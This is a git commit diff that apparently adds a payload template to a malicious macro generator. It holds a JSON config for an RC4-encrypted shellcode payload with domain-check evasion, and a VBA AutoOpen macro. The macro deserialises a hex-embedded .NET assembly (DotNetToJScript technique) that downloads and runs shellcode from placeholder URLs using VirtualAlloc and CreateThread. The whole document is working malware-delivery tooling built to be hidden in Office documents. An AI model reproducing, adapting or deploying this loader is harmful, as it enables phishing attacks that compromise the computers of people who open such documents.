commit
25996fa089
|
@ -0,0 +1,19 @@
|
||||||
|
{
|
||||||
|
"description": "DotnettoJS with RC4 encrypted payload\nEvasion technique set to domain check",
|
||||||
|
"template": "templates/payloads/dotnettojs-evasion-template.vba",
|
||||||
|
"varcount": 150,
|
||||||
|
"encodingoffset": 4,
|
||||||
|
"chunksize": 200,
|
||||||
|
"encodedvars": {
|
||||||
|
|
||||||
|
"DOMAIN":"TEST",
|
||||||
|
"URL_X86":"https://RC4.encrypted.base64.shellcode.32.bit/?1=1",
|
||||||
|
"URL_X64":"https://RC4.encrypted.base64.shellcode.64.bit/?1=3",
|
||||||
|
"DECRYPTION_KEY":"RC4.base64.decryption.key",
|
||||||
|
"WAIT_TIME":"4294967295"
|
||||||
|
|
||||||
|
},
|
||||||
|
"vars": [],
|
||||||
|
"evasion": ["encoder", "domain"],
|
||||||
|
"payload": ""
|
||||||
|
}
|
|
@ -0,0 +1,188 @@
|
||||||
|
[use:exec]
|
||||||
|
[use:dhdh]
|
||||||
|
|
||||||
|
Sub AutoOpen()
|
||||||
|
Dim var1 As String
|
||||||
|
Dim var2 As Object
|
||||||
|
Dim var3 As Integer
|
||||||
|
Dim var4 As String
|
||||||
|
Dim var5 As String
|
||||||
|
|
||||||
|
var5 = func_evasion_domain()
|
||||||
|
If (var5 = "bool1") Then
|
||||||
|
var4 = exec(var2, var4, var3)
|
||||||
|
End If
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Private Function dhdh(dhdh1)
|
||||||
|
Dim dhdh2, dhdh3
|
||||||
|
Set dhdh2 = CreateObject(decode("{[Microsoft.XMLDOM]}"))
|
||||||
|
Set dhdh3 = dhdh2.createElement(decode("{[z]}"))
|
||||||
|
dhdh3.DataType = decode("{[bin.hex]}")
|
||||||
|
dhdh3.Text = dhdh1
|
||||||
|
dhdh = dhdh3.NodeTypedValue
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
|
||||||
|
Dim exec4 As Object, exec5 As Object, exec6 As Object
|
||||||
|
Set exec6 = CreateObject(decode("{[System.Collections.ArrayList]}"))
|
||||||
|
Set exec5 = CreateObject(decode("{[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter]}"))
|
||||||
|
Set exec4 = CreateObject(decode("{[System.IO.MemoryStream]}"))
|
||||||
|
|
||||||
|
Dim exec7
|
||||||
|
exec7 = decode("{[0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C64]}")
|
||||||
|
exec7 = exec7 & decode("{[6572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C65676174655365726961]}")
|
||||||
|
exec7 = exec7 & decode("{[6C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C656761746553657269616C697A617469]}")
|
||||||
|
exec7 = exec7 & decode("{[6F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C6465]}")
|
||||||
|
exec7 = exec7 & decode("{[7209020000000903000000090400000004020000003053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465]}")
|
||||||
|
exec7 = exec7 & decode("{[722B44656C6567617465456E74727907000000047479706508617373656D626C7906746172676574127461726765745479706541737365]}")
|
||||||
|
exec7 = exec7 & decode("{[6D626C790E746172676574547970654E616D650A6D6574686F644E616D650D64656C6567617465456E7472790101020101010330537973]}")
|
||||||
|
exec7 = exec7 & decode("{[74656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374]}")
|
||||||
|
exec7 = exec7 & decode("{[656D2E52756E74696D652E52656D6F74696E672E4D6573736167696E672E48656164657248616E646C657206060000004B6D73636F726C]}")
|
||||||
|
exec7 = exec7 & decode("{[69622C2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237]}")
|
||||||
|
exec7 = exec7 & decode("{[376135633536313933346530383906070000000774617267657430090600000006090000000F53797374656D2E44656C6567617465060A]}")
|
||||||
|
exec7 = exec7 & decode("{[0000000D44796E616D6963496E766F6B650A04030000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C]}")
|
||||||
|
exec7 = exec7 & decode("{[646572030000000844656C65676174650774617267657430076D6574686F64300307033053797374656D2E44656C656761746553657269]}")
|
||||||
|
exec7 = exec7 & decode("{[616C697A6174696F6E486F6C6465722B44656C6567617465456E747279022F53797374656D2E5265666C656374696F6E2E4D656D626572]}")
|
||||||
|
exec7 = exec7 & decode("{[496E666F53657269616C697A6174696F6E486F6C646572090B000000090C000000090D00000004040000002F53797374656D2E5265666C]}")
|
||||||
|
exec7 = exec7 & decode("{[656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C64657206000000044E616D650C417373656D626C794E]}")
|
||||||
|
exec7 = exec7 & decode("{[616D6509436C6173734E616D65095369676E61747572650A4D656D626572547970651047656E65726963417267756D656E747301010101]}")
|
||||||
|
exec7 = exec7 & decode("{[0003080D53797374656D2E547970655B5D090A0000000906000000090900000006110000002C53797374656D2E4F626A6563742044796E]}")
|
||||||
|
exec7 = exec7 & decode("{[616D6963496E766F6B652853797374656D2E4F626A6563745B5D29080000000A010B0000000200000006120000002053797374656D2E58]}")
|
||||||
|
exec7 = exec7 & decode("{[6D6C2E536368656D612E586D6C56616C756547657474657206130000004D53797374656D2E586D6C2C2056657273696F6E3D322E302E30]}")
|
||||||
|
exec7 = exec7 & decode("{[2E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D62373761356335363139333465303839061400]}")
|
||||||
|
exec7 = exec7 & decode("{[00000774617267657430090600000006160000001A53797374656D2E5265666C656374696F6E2E417373656D626C790617000000044C6F]}")
|
||||||
|
exec7 = exec7 & decode("{[61640A0F0C00000000180000024D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F74]}")
|
||||||
|
exec7 = exec7 & decode("{[2062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103001212165A0000000000000000E0002220]}")
|
||||||
|
exec7 = exec7 & decode("{[0B013000001000000006000000000000BA2F00000020000000400000000000100020000000020000040000000000000004000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000682F00004F00]}")
|
||||||
|
exec7 = exec7 & decode("{[0000004000005003000000000000000000000000000000000000006000000C000000302E00001C00000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[000000002E74657874000000C00F0000002000000010000000020000000000000000000000000000200000602E72737263000000500300]}")
|
||||||
|
exec7 = exec7 & decode("{[00004000000004000000120000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001600000000]}")
|
||||||
|
exec7 = exec7 & decode("{[0000000000000000000040000042000000000000000000000000000000009C2F00000000000048000000020005008C220000A40B000001]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[133007009A0000000100001105280F00000A281000000A1A330E032807000006280F00000A0A2B0C042807000006280F00000A0A062806]}")
|
||||||
|
exec7 = exec7 & decode("{[0000060B72010000702803000006721B0000702804000006D003000002281100000A281200000A740300000216078E697E010000047E02]}")
|
||||||
|
exec7 = exec7 & decode("{[00000428010000060C071608078E69281300000A7E1400000A267E1400000A0D161304161608091612046F0B0000060E04280200000626]}")
|
||||||
|
exec7 = exec7 & decode("{[2A000013300500DB0000000200001120000100008D1E000001130520000100008D1E0000011306038E698D1F0000011307160B2B141105]}")
|
||||||
|
exec7 = exec7 & decode("{[070207028E695D919E110607079E0717580B07200001000032E416250B0C2B2A081106079458110507945820000100005D0C1106079413]}")
|
||||||
|
exec7 = exec7 & decode("{[04110607110608949E11060811049E0717580B07200001000032CE16250B250C0A2B500617580A0620000100005D0A0811060694580C08]}")
|
||||||
|
exec7 = exec7 & decode("{[20000100005D0C110606941304110606110608949E11060811049E110611060694110608945820000100005D940D1107070307910961D2]}")
|
||||||
|
exec7 = exec7 & decode("{[9C0717580B07038E6932AA11072A001B3003005A000000030000117E1500000A0A02281600000A742200000125176F1700000A6F180000]}")
|
||||||
|
exec7 = exec7 & decode("{[0A74100000010B076F1900000A0C08731A00000A0D096F1B00000A0ADE1E092C06096F1C00000ADC082C06086F1C00000ADC072C06076F]}")
|
||||||
|
exec7 = exec7 & decode("{[1C00000ADC062A00000128000002003100093A000A0000000002002A001A44000A00000000020023002B4E000A000000001E02281D0000]}")
|
||||||
|
exec7 = exec7 & decode("{[0A2A4A200010000080010000041F4080020000042A0042534A4201000100000000000C00000076322E302E35303732370000000005006C]}")
|
||||||
|
exec7 = exec7 & decode("{[0000006C040000237E0000D80400001C05000023537472696E677300000000F409000038000000235553002C0A00001000000023475549]}")
|
||||||
|
exec7 = exec7 & decode("{[440000003C0A00006801000023426C6F620000000000000002000001571502140902000000FA0133001600000100000026000000030000]}")
|
||||||
|
exec7 = exec7 & decode("{[00020000000D000000220000001D0000000F00000003000000020000000400000001000000020000000100000000003E03010000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[060032024A0406009F024A0406005D0103040F006A0400000600850190030600F30190030600D401900306008602900306005202900306]}")
|
||||||
|
exec7 = exec7 & decode("{[006B02900306009C019003060071012B0406004F012B040600B7019003060095046E030A001201A3040600670362000600B90362000600]}")
|
||||||
|
exec7 = exec7 & decode("{[A2032B04060010022B0406003D016E030600B2046E03060000036E030600C6046E030600FC036E0306000D016E030600DF006E03060029]}")
|
||||||
|
exec7 = exec7 & decode("{[032B04060046016E0306000A006E030600BD026E030600DD026E030A00D204A3040A00CE04A3040A001604A3040A001601A3040600C603]}")
|
||||||
|
exec7 = exec7 & decode("{[62000600D3006E03000000002000000000000100010001001000170300003D0001000100030100008B000000550003000A001100310096]}")
|
||||||
|
exec7 = exec7 & decode("{[00110042009600000000008000912094009900010000000000800091208804A100050000000000800096200A05A7000700000000008000]}")
|
||||||
|
exec7 = exec7 & decode("{[96207904AC0008005020000000008600CB02B2000A00F820000000009600DD04BA000E00E021000000009600AE04C30010007022000000]}")
|
||||||
|
exec7 = exec7 & decode("{[008618EF03060011007822000000009118F503C80011000000000003008618EF03CC001100000000000300C601CC00D200130000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[0300C601C700DD001900000000000300C601BD00EC002100000001005A0000000200500000000300560300000400290000000100490000]}")
|
||||||
|
exec7 = exec7 & decode("{[000200DD0400000100DD0400000100B200000002001E0300000100180000000200100000000300E70400000400030100000100F7020000]}")
|
||||||
|
exec7 = exec7 & decode("{[02006C00000001005203000001009C0400000200AB00000001007700000002008B0000000300E402000004002900000005003100000006]}")
|
||||||
|
exec7 = exec7 & decode("{[001E03000001007700000002008B0000000300E402000004002900000005003100000006001E03000007000E03000008009C0400000100]}")
|
||||||
|
exec7 = exec7 & decode("{[1E0300000200BF040900EF0301001100EF0306001900EF030A002900EF0310003100EF0310003900EF0310004100EF0310004900EF0310]}")
|
||||||
|
exec7 = exec7 & decode("{[005100EF0310005900EF0310006100EF0315006900EF0310007100EF031000A100EF031A00C100D3022A00C900C2023000D100F1003400]}")
|
||||||
|
exec7 = exec7 & decode("{[E100D1033B00E10005054300C900B4034C00010116056700090136016A0011017503710009012201780021015C037E009100EF03830029]}")
|
||||||
|
exec7 = exec7 & decode("{[01A100890031012E0106007900EF0306002E000B00F4002E001300FD002E001B001C012E00230025012E002B0025012E00330025012E00]}")
|
||||||
|
exec7 = exec7 & decode("{[3B0025012E00430025012E004B0025012E00530025012E005B0025012E0063002B012E006B00550143005B006201630073001C0120004F]}")
|
||||||
|
exec7 = exec7 & decode("{[005D000100310300010300940001000001050088040100000107000A050200000109007904020004800000010000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[0000F50400000200000000000000000000008D008200000000000200000000000000000000008D006E0300000000030002000000006B65]}")
|
||||||
|
exec7 = exec7 & decode("{[726E656C333200496E7433320075726C5F7836340075726C5F783836003C4D6F64756C653E00614974417470420046516F515A4D62456A]}")
|
||||||
|
exec7 = exec7 & decode("{[49626C42545944006E577A744B45006C69476C69490054696F7561527A7349004850515062524C0053797374656D2E494F00766F6C5870]}")
|
||||||
|
exec7 = exec7 & decode("{[537A574B550075617856764C746C5A59006D73636F726C696200535445517A4F5463005669727475616C416C6C6F630052656164546F45]}")
|
||||||
|
exec7 = exec7 & decode("{[6E64006D6574686F6400736E6A4D42657652736400456E64496E766F6B6500426567696E496E766F6B650049446973706F7361626C6500]}")
|
||||||
|
exec7 = exec7 & decode("{[52756E74696D655479706548616E646C65004765745479706546726F6D48616E646C6500776169745F74696D6500547970650048747470]}")
|
||||||
|
exec7 = exec7 & decode("{[576562526573706F6E736500476574526573706F6E736500446973706F736500437265617465004D756C74696361737444656C65676174]}")
|
||||||
|
exec7 = exec7 & decode("{[6500477569644174747269627574650044656275676761626C6541747472696275746500436F6D56697369626C65417474726962757465]}")
|
||||||
|
exec7 = exec7 & decode("{[00417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B4174747269627574650041737365]}")
|
||||||
|
exec7 = exec7 & decode("{[6D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E417474726962757465]}")
|
||||||
|
exec7 = exec7 & decode("{[00417373656D626C794465736372697074696F6E41747472696275746500556E6D616E6167656446756E6374696F6E506F696E74657241]}")
|
||||||
|
exec7 = exec7 & decode("{[747472696275746500436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F647563]}")
|
||||||
|
exec7 = exec7 & decode("{[7441747472696275746500417373656D626C79436F7079726967687441747472696275746500417373656D626C79436F6D70616E794174]}")
|
||||||
|
exec7 = exec7 & decode("{[747269627574650052756E74696D65436F6D7061746962696C6974794174747269627574650042797465006765745F53697A6500446F53]}")
|
||||||
|
exec7 = exec7 & decode("{[747566660046726F6D426173653634537472696E6700616D5167636768445551547A744E76544168004A6E45646C78566A004173796E63]}")
|
||||||
|
exec7 = exec7 & decode("{[43616C6C6261636B0063616C6C6261636B00446F576F726B004E6C5579594C74694B6C004D61727368616C006B65726E656C33322E646C]}")
|
||||||
|
exec7 = exec7 & decode("{[6C004578616D706C65417373656D626C792E646C6C0075726C007A7A7A446D00476574526573706F6E736553747265616D005379737465]}")
|
||||||
|
exec7 = exec7 & decode("{[6D007365745F4175746F6D617469634465636F6D7072657373696F6E0053797374656D2E5265666C656374696F6E0043616C6C696E6743]}")
|
||||||
|
exec7 = exec7 & decode("{[6F6E76656E74696F6E005A65726F0053747265616D52656164657200546578745265616465720047657444656C6567617465466F724675]}")
|
||||||
|
exec7 = exec7 & decode("{[6E6374696F6E506F696E746572002E63746F72002E6363746F7200496E745074720053797374656D2E446961676E6F7374696373004465]}")
|
||||||
|
exec7 = exec7 & decode("{[636F6D7072657373696F6E4D6574686F64730053797374656D2E52756E74696D652E496E7465726F705365727669636573005379737465]}")
|
||||||
|
exec7 = exec7 & decode("{[6D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730047657450726F63416464726573]}")
|
||||||
|
exec7 = exec7 & decode("{[730057616974466F7253696E676C654F626A656374006F626A6563740053797374656D2E4E65740066657400494173796E63526573756C]}")
|
||||||
|
exec7 = exec7 & decode("{[7400726573756C7400436F6E76657274004874747057656252657175657374007169737A735A6D4F770064656372797074696F6E4B6579]}")
|
||||||
|
exec7 = exec7 & decode("{[004578616D706C65417373656D626C7900436F7079004C6F61644C69627261727900456D7074790000196B00650072006E0065006C0033]}")
|
||||||
|
exec7 = exec7 & decode("{[0032002E0064006C006C0000194300720065006100740065005400680072006500610064000000000047A32104E3323D43851977D9C056]}")
|
||||||
|
exec7 = exec7 & decode("{[421300042001010803200001052001011111042001010E042001010205200101114D0907051D051D051818090500011D050E0300000806]}")
|
||||||
|
exec7 = exec7 & decode("{[00011269116D0700021275181269080004011D050818080206180D070808080808081D081D081D050907040E12411245124902060E0600]}")
|
||||||
|
exec7 = exec7 & decode("{[011280850E0620010111808D05200012809104200012450520010112450320000E08B77A5C561934E08902060907000418090909090500]}")
|
||||||
|
exec7 = exec7 & decode("{[02091809040001180E05000218180E072004010E0E0E090800021D051D051D050400010E0E03000001052002011C180A20061809091818]}")
|
||||||
|
exec7 = exec7 & decode("{[0910090E2008125909091818091009125D1C07200218100912590801000800000000001E01000100540216577261704E6F6E4578636570]}")
|
||||||
|
exec7 = exec7 & decode("{[74696F6E5468726F7773010801000200000000000501000000002901002435353531386631632D366461612D343939342D613331312D61]}")
|
||||||
|
exec7 = exec7 & decode("{[663333376162653537323200000C010007312E302E302E300000050100010000000000001212165A00000000020000001C0100004C2E00]}")
|
||||||
|
exec7 = exec7 & decode("{[004C1000005253445381B620F1FB57E1488310EDA8943AB42601000000443A5C4578636C7573696F6E735C446576656C6F706D656E745C]}")
|
||||||
|
exec7 = exec7 & decode("{[446F744E6574546F4A5363726970742D6372656174652074656D706C6174655C4578616D706C65417373656D626C795C6F626A5C52656C]}")
|
||||||
|
exec7 = exec7 & decode("{[656173655C4578616D706C65417373656D626C792E70646200000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[0000000000000000000000000000902F00000000000000000000AA2F00000020000000000000000000000000000000000000000000009C]}")
|
||||||
|
exec7 = exec7 & decode("{[2F0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002000100000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000100000000004800000058400000F40200000000000000000000F40234000000560053005F00560045005200530049]}")
|
||||||
|
exec7 = exec7 & decode("{[004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F0000000000000004000000]}")
|
||||||
|
exec7 = exec7 & decode("{[02000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F000000000024000400000054]}")
|
||||||
|
exec7 = exec7 & decode("{[00720061006E0073006C006100740069006F006E00000000000000B00454020000010053007400720069006E006700460069006C006500]}")
|
||||||
|
exec7 = exec7 & decode("{[49006E0066006F0000003002000001003000300030003000300034006200300000001A000100010043006F006D006D0065006E00740073]}")
|
||||||
|
exec7 = exec7 & decode("{[0000000000000022000100010043006F006D00700061006E0079004E0061006D00650000000000000000002A0001000100460069006C00]}")
|
||||||
|
exec7 = exec7 & decode("{[65004400650073006300720069007000740069006F006E000000000000000000300008000100460069006C006500560065007200730069]}")
|
||||||
|
exec7 = exec7 & decode("{[006F006E000000000031002E0030002E0030002E003000000048001400010049006E007400650072006E0061006C004E0061006D006500]}")
|
||||||
|
exec7 = exec7 & decode("{[00004500780061006D0070006C00650041007300730065006D0062006C0079002E0064006C006C0000002600010001004C006500670061]}")
|
||||||
|
exec7 = exec7 & decode("{[006C0043006F0070007900720069006700680074000000000000002A00010001004C006500670061006C00540072006100640065006D00]}")
|
||||||
|
exec7 = exec7 & decode("{[610072006B00730000000000000000005000140001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000]}")
|
||||||
|
exec7 = exec7 & decode("{[004500780061006D0070006C00650041007300730065006D0062006C0079002E0064006C006C000000220001000100500072006F006400]}")
|
||||||
|
exec7 = exec7 & decode("{[7500630074004E0061006D0065000000000000000000340008000100500072006F006400750063007400560065007200730069006F006E]}")
|
||||||
|
exec7 = exec7 & decode("{[00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F00]}")
|
||||||
|
exec7 = exec7 & decode("{[6E00000031002E0030002E0030002E00300000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[0000000000000000000000000000000000000000000000000000000000000000000000002000000C000000BC3F00000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000]}")
|
||||||
|
exec7 = exec7 & decode("{[00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010D00]}")
|
||||||
|
exec7 = exec7 & decode("{[000004000000091700000009060000000916000000061A0000002753797374656D2E5265666C656374696F6E2E417373656D626C79204C]}")
|
||||||
|
exec7 = exec7 & decode("{[6F616428427974655B5D29080000000A0B]}")
|
||||||
|
|
||||||
|
Dim exec8
|
||||||
|
exec8 = dhdh(exec7)
|
||||||
|
|
||||||
|
For Each exec9 In exec8
|
||||||
|
exec4.WriteByte exec9
|
||||||
|
Next exec9
|
||||||
|
|
||||||
|
exec4.Position = 0
|
||||||
|
|
||||||
|
Dim exec10 As Object, exec11 As Object, exec12 As Object
|
||||||
|
Set exec10 = exec5.SurrogateSelector
|
||||||
|
Set exec11 = exec5.Deserialize_2(exec4)
|
||||||
|
exec6.Add exec10
|
||||||
|
|
||||||
|
Set exec12 = exec11.DynamicInvoke(exec6.ToArray()).CreateInstance(decode("{[DoWork]}"))
|
||||||
|
exec12.DoStuff decode("[URL_X86]"), decode("[URL_X64]"), decode("[DECRYPTION_KEY]"), decode("[WAIT_TIME]")
|
||||||
|
exec13 = "exec14"
|
||||||
|
exec = exec13
|
||||||
|
End Function
|
Loading…
Reference in New Issue